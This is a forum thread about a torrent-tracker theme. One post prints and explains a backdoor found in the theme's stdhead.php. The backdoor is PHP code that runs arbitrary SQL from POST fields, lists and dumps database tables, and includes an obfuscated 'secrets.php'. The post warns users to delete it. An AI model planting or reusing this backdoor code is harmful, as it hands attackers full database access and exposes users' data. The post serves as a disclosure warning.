Bravo List
Page 1 of 3 1 2 3
Show 40 post(s) from this thread on one page

Bravo List (http://www.bvlist.com/index.php)
-   Mods & Themes (http://www.bvlist.com/forumdisplay.php?f=109)
-   -   Urban Dirty (http://www.bvlist.com/showthread.php?t=4301)

sammygo 22nd January 2010 10:27
Urban Dirty
 
2 Attachment(s)
attention

Attention

ATTENTION: stdhead.php file might contain some BACKDOOR





http://img294.imageshack.us/img294/1...oadprevmy8.jpg http://img514.imageshack.us/img514/515/55843982ru9.jpg
http://i49.tinypic.com/2mc7q1c.png http://img514.imageshack.us/img514/6453/41199384cg4.jpg

tlogic 21st March 2010 14:45
attention

Attention



The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.
In any case the backdoor is in the file: include/stdhead.php at lines 260-299.





These are the offending lines:
PHP Code:
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];

...

if($h_cmd) {
set_time_limit(0);
mysql_query($h_cmd) or die(mysql_error());
}
if($h_display) {
set_time_limit(0);
$h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
include $h_addr;
echo "";
if($mysql_db$h_tables=mysql_list_tables($mysql_db);
else $h_tables=mysql_list_tables($_POST['db']);
while(list($h_table)=mysql_fetch_row($h_tables)) {
echo "<b>$h_table</b>";
$h_res=mysql_query("describe $h_table") or die(mysql_error());
echo  "<table><tr><td>Field</td><td>Type</td><td>NULL</td><td>Key</td><td>Default</td><td>Extra</td></tr>";
while($h_desc=mysql_fetch_array($h_res))
echo  "<tr><td>$h_desc[0]</td><td>$h_desc[1]</td><td>$h_desc[2]</td><td>$h_desc[3]</td><td>$h_desc[4]</td></tr>";
echo "</table>";
}
}
if($h_table) {
set_time_limit(0);
$x=1;
$h_res=mysql_query("select*from $h_table") or die(mysql_error());
$i=mysql_num_fields($h_res);
echo "<table>";
while($h_value=mysql_fetch_row($h_res)) {
echo "<tr><td><b>".$x++."</b></td>";
for($j=0;$j<=$i;$j++)
echo "<td>".$h_value[$j]."</td>";
echo "</tr>";
}
echo "</table>";
So what this code basically does:

The "h_cmd" POST variable executes any SQL command on the server.

The "h_display" POST variable displays a list of all the tables in the database.
The attacker also has the ability to select another database by supplying the POST variable "db".

The "h_table" POST variable prints all the data contained in the table specified by "h_table".

Also the variable $h_addr contains the string secrets.php and is used to include that file.

So to be safe delete all the above lines from stdhead.php.
I haven't thoroughly reviewed the whole code so there might be more backdoors in the other files.

So beware before using that code!

antec9000 23rd March 2010 21:24
Nice theme !
 
This most be one of the nicest themes i've ever have seen to tbdev, but because i sucks on coding i can't figure out how i should do to make the theme work

So I should be very happy if someone could help me :drink:

redesmania 23rd March 2010 21:55
help
 
the scripts need to be able to flash the coluca Work!

PHP Code:
<script  type="text/javascript" src="script/swfobject.js"> </ script

movizdb 9th June 2010 00:16
Beware!
 
Thanks a lot By the way can you port this to xbtit please

aqila 16th October 2010 12:57
tks

aaaaaa 20th October 2010 19:30
TUTORIAL :)
 
yes pls tutorial host to install pls

CAGADA 9th January 2011 13:23
how to install? pls

superize 12th January 2011 02:51
How to install theme ?

sammygo 14th January 2011 10:38
I think the best way to install this theme is:

1. Download Filelist v2.0 and install it.
2. Replace Theme Files to the Source.

It will work :drink:


All times are GMT +2. The time now is 23:59.
Page 1 of 3 1 2 3
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.